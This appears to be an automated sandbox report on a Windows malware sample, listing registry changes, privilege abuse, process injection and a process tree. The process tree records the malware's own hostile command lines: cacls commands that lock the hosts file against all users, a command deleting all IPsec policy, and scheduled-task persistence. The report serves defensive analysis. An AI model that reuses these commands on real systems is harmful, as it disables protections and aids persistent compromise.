\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2724 cmd.exe 3032 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral1/files/0x0008000000015ed2-5.dat nsis_installer_2 behavioral1/files/0x00090000000164db-16.dat nsis_installer_1 behavioral1/files/0x00090000000164db-16.dat nsis_installer_2 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs jkdzukl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA jkdzukl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" jkdzukl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zukyhlbkc.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\1a-9c-ac-2a-1c-e3\WpadDetectedUrl jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing jkdzukl.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D21D69C8-BA15-40EB-95E3-A6457BF34E87}\WpadDecision = "0" jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust jkdzukl.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" jkdzukl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople jkdzukl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" zukyhlbkc.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs jkdzukl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs jkdzukl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot jkdzukl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zukyhlbkc.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates jkdzukl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump zukyhlbkc.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" zukyhlbkc.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs jkdzukl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 jkdzukl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump zukyhlbkc.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" zukyhlbkc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ jkdzukl.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\1a-9c-ac-2a-1c-e3\WpadDecisionReason = "1" jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople jkdzukl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" jkdzukl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad jkdzukl.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" zukyhlbkc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA jkdzukl.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs jkdzukl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 jkdzukl.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D21D69C8-BA15-40EB-95E3-A6457BF34E87} jkdzukl.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" jkdzukl.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 jkdzukl.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 jkdzukl.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3032 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2792 schtasks.exe 648 schtasks.exe 2680 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2920 jkdzukl.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe -
Suspicious behavior: LoadsDriver 31 IoCs
pid Process 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2796 3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 2796 3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe Token: SeDebugPrivilege 2604 jkdzukl.exe Token: SeDebugPrivilege 2760 jkdzukl.exe Token: SeDebugPrivilege 2340 vfshost.exe Token: SeAuditPrivilege 1572 svchost.exe Token: SeDebugPrivilege 1448 zukyhlbkc.exe Token: SeShutdownPrivilege 1448 zukyhlbkc.exe Token: SeLockMemoryPrivilege 3040 bepcel.exe Token: SeLockMemoryPrivilege 3040 bepcel.exe Token: SeDebugPrivilege 2796 zukyhlbkc.exe Token: SeShutdownPrivilege 2796 zukyhlbkc.exe Token: SeDebugPrivilege 1764 zukyhlbkc.exe Token: SeShutdownPrivilege 1764 zukyhlbkc.exe Token: SeDebugPrivilege 2136 zukyhlbkc.exe Token: SeShutdownPrivilege 2136 zukyhlbkc.exe Token: SeDebugPrivilege 1284 zukyhlbkc.exe Token: SeShutdownPrivilege 1284 zukyhlbkc.exe Token: SeDebugPrivilege 600 zukyhlbkc.exe Token: SeShutdownPrivilege 600 zukyhlbkc.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 2796 3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe 2796 3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe 2604 jkdzukl.exe 2604 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 1992 xohudmc.exe 2656 sssscc.exe 2920 jkdzukl.exe 2920 jkdzukl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2796 wrote to memory of 2724 2796 3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe 31 PID 2796 wrote to memory of 2724 2796 3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe 31 PID 2796 wrote to memory of 2724 2796 3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe 31 PID 2796 wrote to memory of 2724 2796 3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe 31 PID 2724 wrote to memory of 3032 2724 cmd.exe 33 PID 2724 wrote to memory of 3032 2724 cmd.exe 33 PID 2724 wrote to memory of 3032 2724 cmd.exe 33 PID 2724 wrote to memory of 3032 2724 cmd.exe 33 PID 2724 wrote to memory of 2604 2724 cmd.exe 34 PID 2724 wrote to memory of 2604 2724 cmd.exe 34 PID 2724 wrote to memory of 2604 2724 cmd.exe 34 PID 2724 wrote to memory of 2604 2724 cmd.exe 34 PID 2760 wrote to memory of 2572 2760 jkdzukl.exe 36 PID 2760 wrote to memory of 2572 2760 jkdzukl.exe 36 PID 2760 wrote to memory of 2572 2760 jkdzukl.exe 36 PID 2760 wrote to memory of 2572 2760 jkdzukl.exe 36 PID 2572 wrote to memory of 2648 2572 cmd.exe 38 PID 2572 wrote to memory of 2648 2572 cmd.exe 38 PID 2572 wrote to memory of 2648 2572 cmd.exe 38 PID 2572 wrote to memory of 2648 2572 cmd.exe 38 PID 2572 wrote to memory of 2692 2572 cmd.exe 39 PID 2572 wrote to memory of 2692 2572 cmd.exe 39 PID 2572 wrote to memory of 2692 2572 cmd.exe 39 PID 2572 wrote to memory of 2692 2572 cmd.exe 39 PID 2572 wrote to memory of 2416 2572 cmd.exe 40 PID 2572 wrote to memory of 2416 2572 cmd.exe 40 PID 2572 wrote to memory of 2416 2572 cmd.exe 40 PID 2572 wrote to memory of 2416 2572 cmd.exe 40 PID 2572 wrote to memory of 2404 2572 cmd.exe 41 PID 2572 wrote to memory of 2404 2572 cmd.exe 41 PID 2572 wrote to memory of 2404 2572 cmd.exe 41 PID 2572 wrote to memory of 2404 2572 cmd.exe 41 PID 2572 wrote to memory of 2268 2572 cmd.exe 42 PID 2572 wrote to memory of 2268 2572 cmd.exe 42 PID 2572 wrote to memory of 2268 2572 cmd.exe 42 PID 2572 wrote to memory of 2268 2572 cmd.exe 42 PID 2572 wrote to memory of 776 2572 cmd.exe 43 PID 2572 wrote to memory of 776 2572 cmd.exe 43 PID 2572 wrote to memory of 776 2572 cmd.exe 43 PID 2572 wrote to memory of 776 2572 cmd.exe 43 PID 2760 wrote to memory of 2412 2760 jkdzukl.exe 44 PID 2760 wrote to memory of 2412 2760 jkdzukl.exe 44 PID 2760 wrote to memory of 2412 2760 jkdzukl.exe 44 PID 2760 wrote to memory of 2412 2760 jkdzukl.exe 44 PID 2760 wrote to memory of 2916 2760 jkdzukl.exe 46 PID 2760 wrote to memory of 2916 2760 jkdzukl.exe 46 PID 2760 wrote to memory of 2916 2760 jkdzukl.exe 46 PID 2760 wrote to memory of 2916 2760 jkdzukl.exe 46 PID 2760 wrote to memory of 2896 2760 jkdzukl.exe 48 PID 2760 wrote to memory of 2896 2760 jkdzukl.exe 48 PID 2760 wrote to memory of 2896 2760 jkdzukl.exe 48 PID 2760 wrote to memory of 2896 2760 jkdzukl.exe 48 PID 2760 wrote to memory of 2960 2760 jkdzukl.exe 50 PID 2760 wrote to memory of 2960 2760 jkdzukl.exe 50 PID 2760 wrote to memory of 2960 2760 jkdzukl.exe 50 PID 2760 wrote to memory of 2960 2760 jkdzukl.exe 50 PID 2960 wrote to memory of 2992 2960 cmd.exe 52 PID 2960 wrote to memory of 2992 2960 cmd.exe 52 PID 2960 wrote to memory of 2992 2960 cmd.exe 52 PID 2960 wrote to memory of 2992 2960 cmd.exe 52 PID 2960 wrote to memory of 2992 2960 cmd.exe 52 PID 2960 wrote to memory of 2992 2960 cmd.exe 52 PID 2960 wrote to memory of 2992 2960 cmd.exe 52 PID 2992 wrote to memory of 484 2992 wpcap.exe 53
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:928
-
C:\Windows\TEMP\ytujrpycs\bepcel.exe"C:\Windows\TEMP\ytujrpycs\bepcel.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Users\Admin\AppData\Local\Temp\3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe"C:\Users\Admin\AppData\Local\Temp\3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\eujkczal\jkdzukl.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3032
-
-
C:\Windows\eujkczal\jkdzukl.exeC:\Windows\eujkczal\jkdzukl.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2604
-
-
-
C:\Windows\eujkczal\jkdzukl.exeC:\Windows\eujkczal\jkdzukl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2648
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2416
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2268
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:776
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
